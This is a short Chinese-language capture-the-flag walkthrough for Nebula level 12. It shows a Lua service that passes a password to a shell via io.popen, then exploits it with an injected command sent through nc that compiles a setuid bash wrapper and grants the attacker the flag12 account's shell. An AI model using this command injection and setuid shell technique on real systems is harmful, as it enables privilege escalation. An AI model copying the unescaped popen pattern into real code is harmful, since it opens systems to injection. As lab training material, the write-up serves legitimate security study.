ExploitExercises_Nebula_Level12

程序源码为lua脚本：

local socket = require("socket")local server = assert(socket.bind("127.0.0.1", 50001))function hash(password)  prog = io.popen("echo "..password.." | sha1sum", "r")  data = prog:read("*all")  prog:close()  data = string.sub(data, 1, 40)  return dataendwhile 1 do  local client = server:accept()  client:send("Password: ")  client:settimeout(60)  local line, err = client:receive()  if not err then      print("trying " .. line) -- log from where ;\      local h = hash(line)      if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then          client:send("Better luck next time\n");      else          client:send("Congrats, your token is 413**CARRIER LOST**\n")      end  end  client:close()end

可以对password进行注入：

1. 在/tmp目录下创建shell.c:

#include <stdlib.h>#include <unistd.h>#include <sys/types.h>#include <stdio.h>int main(int argc, char **argv, char **envp){  gid_t gid;  uid_t uid;  gid = getegid();  uid = geteuid();  setresgid(gid, gid, gid);  setresuid(uid, uid, uid);  system("/bin/bash");}

2. 参数注入：

level12@nebula:/tmp$ nc localhost 50001Password: 1; gcc -o /tmp/shell /tmp/shell.c; cp /tmp/shell /home/flag12; chmod +s /home/flag12/shell echo 1 

3. 然后运行/home/flag12/shell即可：

level12@nebula:/tmp$ cd /home/flag12level12@nebula:/home/flag12$ ls -ltotal 9-rw-r--r-- 1 root   root    685 2011-11-20 21:22 flag12.lua-rwsr-sr-x 1 flag12 flag12 7321 2016-12-29 19:54 shelllevel12@nebula:/home/flag12$ dateThu Dec 29 19:55:36 PST 2016level12@nebula:/home/flag12$ ./shell flag12@nebula:/home/flag12$